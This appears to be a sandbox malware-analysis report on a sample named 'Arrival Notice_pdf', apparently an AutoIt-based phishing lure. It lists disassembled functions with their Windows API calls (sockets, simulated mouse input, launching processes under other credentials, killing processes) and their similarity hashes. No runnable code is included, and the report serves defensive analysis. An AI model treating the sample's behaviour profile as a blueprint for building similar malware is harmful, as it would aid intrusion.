Function 00298DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,002DDC00), ref: 00298E7C
WSAGetLastError.WSOCK32(00000000), ref: 00298E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00298EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00298EC5
_strlen.LIBCMT ref: 00298EF7
WSAGetLastError.WSOCK32(00000000), ref: 00298F6A

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 9eb482f39f52befde89a07e60f885b7cf2814be587ea797bd2764c03cff9b595
Instruction ID: 1ebd9ccf52574352cf62a8e26d1b97a684ccf8e4ec679b2e363917104bda3c5c
Opcode Fuzzy Hash: 9eb482f39f52befde89a07e60f885b7cf2814be587ea797bd2764c03cff9b595
Instruction Fuzzy Hash: 6241E371520104AFCB18EF64CD89EAEB7B9EF09314F244669F51A972D1DF70AE24CB20

Function 0025ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

BeginPaint.USER32(?,?,?), ref: 0025AC2A
GetWindowRect.USER32(?,?), ref: 0025AC8E
ScreenToClient.USER32(?,?), ref: 0025ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0025ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0025AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002BE673

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: b67a03db46d20fa5df3a3c81b3ee588214b5a6b3123049623d502f60aaede002
Instruction ID: d8b15bb0e310438e9f05c21d1fcb0de6ef43fbafb7d71ec25f9f4228a6c5db3b
Opcode Fuzzy Hash: b67a03db46d20fa5df3a3c81b3ee588214b5a6b3123049623d502f60aaede002
Instruction Fuzzy Hash: AE41DE70111201AFC711DF24DC89FA67BFCAB59362F18036AFDA4872A1C771A858DB62

Function 002AE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00301628,00000000,00301628,00000000,00000000,00301628,?,002BDC5D,00000000,?,00000000,00000000,00000000,?,002BDAD1,00000004), ref: 002AE40B
EnableWindow.USER32(00000000,00000000), ref: 002AE42F
ShowWindow.USER32(00301628,00000000), ref: 002AE48F
ShowWindow.USER32(00000000,00000004), ref: 002AE4A1
EnableWindow.USER32(00000000,00000001), ref: 002AE4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 002AE4E8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 2f13c94cc4935fc2b2b6b0da366e0951467ce80259eb7e99a55dfc6b15638c55
Instruction ID: 1060e65dc6d9b53cd54a75bf85a2d6102c1bc7180a701701e737b71cbf935ad3
Opcode Fuzzy Hash: 2f13c94cc4935fc2b2b6b0da366e0951467ce80259eb7e99a55dfc6b15638c55
Instruction Fuzzy Hash: 7F418334601142EFDF21CF24D499F947BE5BF0A304F5941B9EA588F1A2CB31E856CB61

Function 002898BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 002898D1

Part of subcall function 0025F4EA: std::exception::exception.LIBCMT ref: 0025F51E
Part of subcall function 0025F4EA: __CxxThrowException@8.LIBCMT ref: 0025F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00289908
EnterCriticalSection.KERNEL32(?), ref: 00289924
LeaveCriticalSection.KERNEL32(?), ref: 0028999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002899B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 002899D2

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 33273bf60e1eb0885a0e0038f7817d9adb866c22460d4746a0fb45d408227864
Instruction ID: b5928ee406ac8d44f1d75a74af41fe6bdbf285de4c08800d01fa1fa7cc8e8f45
Opcode Fuzzy Hash: 33273bf60e1eb0885a0e0038f7817d9adb866c22460d4746a0fb45d408227864
Instruction Fuzzy Hash: 68317031900105EBDB10AF94DD89EABB778FF45310B1480B9F904AB286E770DE24DBA5

Function 00299B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,002977F4,?,?,00000000,00000001), ref: 00299B53

Part of subcall function 00296544: GetWindowRect.USER32(?,?), ref: 00296557

GetDesktopWindow.USER32 ref: 00299B7D
GetWindowRect.USER32(00000000), ref: 00299B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00299BB6

Part of subcall function 00287A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00287AD0

GetCursorPos.USER32(?), ref: 00299BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00299C44

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: dee5a39795835b52e8de54b759ae17de3d167385c9f968f40748ef53e385d619
Instruction ID: 0dd94019712860e3f0a5506875793366cc3c384a9cfcccc5cd6289dc509da32d
Opcode Fuzzy Hash: dee5a39795835b52e8de54b759ae17de3d167385c9f968f40748ef53e385d619
Instruction Fuzzy Hash: E931C172104306ABCB10DF58EC49F9AB7EDFF88314F00092AF599E7181D671E958CB91

Function 0027AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0027AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0027AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0027AFC4
CloseHandle.KERNEL32(00000004), ref: 0027AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0027AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 0027B012

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: c372239d06dc851d3093c3e8f2722e10d54443cbf54e0da390c53efeef758ee3
Instruction ID: a6cc433afce00822f28cfcfb10b1d40aa5f315a45b521eca733e7a58f95f223a
Opcode Fuzzy Hash: c372239d06dc851d3093c3e8f2722e10d54443cbf54e0da390c53efeef758ee3
Instruction Fuzzy Hash: EB21807211520EAFCF028F94ED09FAE7BA9EF84314F048025FA05A2161C3769D20DB62

Function 002AEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0025AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0025AFE3
Part of subcall function 0025AF83: SelectObject.GDI32(?,00000000), ref: 0025AFF2
Part of subcall function 0025AF83: BeginPath.GDI32(?), ref: 0025B009
Part of subcall function 0025AF83: SelectObject.GDI32(?,00000000), ref: 0025B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002AEC20
LineTo.GDI32(00000000,00000003,?), ref: 002AEC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002AEC42
LineTo.GDI32(00000000,00000000,?), ref: 002AEC52
EndPath.GDI32(00000000), ref: 002AEC62
StrokePath.GDI32(00000000), ref: 002AEC72

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: d920991315e0a23cc223703b26f1748f6724b77495e40c10ad40f69721108d4f
Instruction ID: a8b07c66af6248382c7618c97b181b0f209a8fe1eeca79906530ff08c40cb546
Opcode Fuzzy Hash: d920991315e0a23cc223703b26f1748f6724b77495e40c10ad40f69721108d4f
Instruction Fuzzy Hash: B711DB7200014DBFEF129F94ED88FEA7F6DEB08364F048126BE1999160D7729D55DBA0

Function 0027E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0027E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0027E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0027E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0027E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0027E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0027E209

Part of subcall function 00279AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00279A05,00000000,00000000,?,00279DDB), ref: 0027A53A

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: c6936df7dae71bbc4e47900a7cdd22369ac158a88723bf226f54c2835d75d7f0
Instruction ID: 4c0be7be5fdeb18e39f92a9135992aec85cfc095d59055bb42f63090cfe76165
Opcode Fuzzy Hash: c6936df7dae71bbc4e47900a7cdd22369ac158a88723bf226f54c2835d75d7f0
Instruction Fuzzy Hash: 890184B5E00315BFEF109FA59C49F5EBFB8EB48351F018066EA08A7290D6719C00CFA0

Function 00267B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00267B47

Part of subcall function 0026123A: __initp_misc_winsig.LIBCMT ref: 0026125E
Part of subcall function 0026123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00267F51
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00267F65
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00267F78
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00267F8B
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00267F9E
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00267FB1
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00267FC4
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00267FD7
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00267FEA
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00267FFD
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00268010
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00268023
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00268036
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00268049
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0026805C
Part of subcall function 0026123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0026806F

__mtinitlocks.LIBCMT ref: 00267B4C

Part of subcall function 00267E23: InitializeCriticalSectionAndSpinCount.KERNEL32(002FAC68,00000FA0,?,?,00267B51,00265E77,002F6C70,00000014), ref: 00267E41

__mtterm.LIBCMT ref: 00267B55

Part of subcall function 00267BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00267B5A,00265E77,002F6C70,00000014), ref: 00267D3F
Part of subcall function 00267BBD: _free.LIBCMT ref: 00267D46
Part of subcall function 00267BBD: DeleteCriticalSection.KERNEL32(002FAC68,?,?,00267B5A,00265E77,002F6C70,00000014), ref: 00267D68

__calloc_crt.LIBCMT ref: 00267B7A
GetCurrentThreadId.KERNEL32 ref: 00267BA3

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: a0f63b371f2118dc3ef930147e84693b7fbcce721924d5f83431e781f2a3420f
Instruction ID: cc33cb3aa76f4b991e3f16d4f0dcb1cb90a557329f9992a4f6d60198fbf78703
Opcode Fuzzy Hash: a0f63b371f2118dc3ef930147e84693b7fbcce721924d5f83431e781f2a3420f
Instruction Fuzzy Hash: DDF0903213D71219EA257B747C0AA5A26849F02B7CF3406A9F864C50E2FF6188F18960

Function 002427EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0024281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00242825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00242830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0024283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00242843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0024284B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 6e09d3fd72ed2d157b860db7e1782af35298b6a8398c0d2d5a97317246725471
Instruction ID: e49c02ce5ececa3d635442efc7f70de4f7559ec15cecb38ffa9a8955a933df81
Opcode Fuzzy Hash: 6e09d3fd72ed2d157b860db7e1782af35298b6a8398c0d2d5a97317246725471
Instruction Fuzzy Hash: 2A0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5

Function 00289AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 3e78e504f85751d14edd13893fbc96d17e41b03cfb7b04e61aecc938210ca851
Instruction ID: f58be565e7527b1fea8dae49a13de211238b939bc8be84124fbff686d06d7790
Opcode Fuzzy Hash: 3e78e504f85751d14edd13893fbc96d17e41b03cfb7b04e61aecc938210ca851
Instruction Fuzzy Hash: A501813A212212ABD7192F98FC9CDFB7769FF88701B18043AF903920E1DB65A851DB51

Function 00287BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00287C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00287C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00287C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00287C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00287C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00287C4C

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 87bfcb527ff554bb57cc0a9761dd2316a3b3b9f574fffaf133f985af0d909c6b
Instruction ID: ce6696f5e7e73d3a4625fab4d7b1026a050af1f36d1a1973ce48a66c7c7cf80c
Opcode Fuzzy Hash: 87bfcb527ff554bb57cc0a9761dd2316a3b3b9f574fffaf133f985af0d909c6b
Instruction Fuzzy Hash: 41F03A76242158BBE7215B52BC0EEEFBB7CEFC6B11F000069FA0591191E7A06A41C6B5

Function 00289A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00289A33
EnterCriticalSection.KERNEL32(?,?,?,?,002B5DEE,?,?,?,?,?,0024ED63), ref: 00289A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,002B5DEE,?,?,?,?,?,0024ED63), ref: 00289A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,002B5DEE,?,?,?,?,?,0024ED63), ref: 00289A5E

Part of subcall function 002893D1: CloseHandle.KERNEL32(?,?,00289A6B,?,?,?,002B5DEE,?,?,?,?,?,0024ED63), ref: 002893DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00289A71
LeaveCriticalSection.KERNEL32(?,?,?,?,002B5DEE,?,?,?,?,?,0024ED63), ref: 00289A78

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: b6ad380bcbbaefd4ca7623bfa3b277e173578f09c4161995bf5029f91684b997
Instruction ID: ffb84c7026e6e54197f42e096add6c0ce6196a003ece65e139fd89f483d5279d
Opcode Fuzzy Hash: b6ad380bcbbaefd4ca7623bfa3b277e173578f09c4161995bf5029f91684b997
Instruction Fuzzy Hash: F7F05E36142212ABD7152BA4FC9DDAA7729FF84301B180436F903910A1DB75A851DB51

Function 00241CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0025F4EA: std::exception::exception.LIBCMT ref: 0025F51E
Part of subcall function 0025F4EA: __CxxThrowException@8.LIBCMT ref: 0025F533

__swprintf.LIBCMT ref: 00241EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00241D49

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 10299bde36a9c48a7f299e49c899ae936aeea846c0ef989d3c7fd827a7063433
Instruction ID: 15727eb781c16498fb96a1c4ea8dcd4e9b06acee12492f61dd047d9ee25cac2e
Opcode Fuzzy Hash: 10299bde36a9c48a7f299e49c899ae936aeea846c0ef989d3c7fd827a7063433
Instruction Fuzzy Hash: 13917C712242029FC728EF24C895CAAB7F4EF95740F50491DF985972A1DB70EE68CB92

Function 0029AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0029B006
CharUpperBuffW.USER32(?,?), ref: 0029B115
VariantClear.OLEAUT32(?), ref: 0029B298

Part of subcall function 00289DC5: VariantInit.OLEAUT32(00000000), ref: 00289E05
Part of subcall function 00289DC5: VariantCopy.OLEAUT32(?,?), ref: 00289E0E
Part of subcall function 00289DC5: VariantClear.OLEAUT32(?), ref: 00289E1A

Strings

AUTOIT.ERROR, xrefs: 0029B11B
Incorrect Parameter format, xrefs: 0029B03E, 0029B20B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
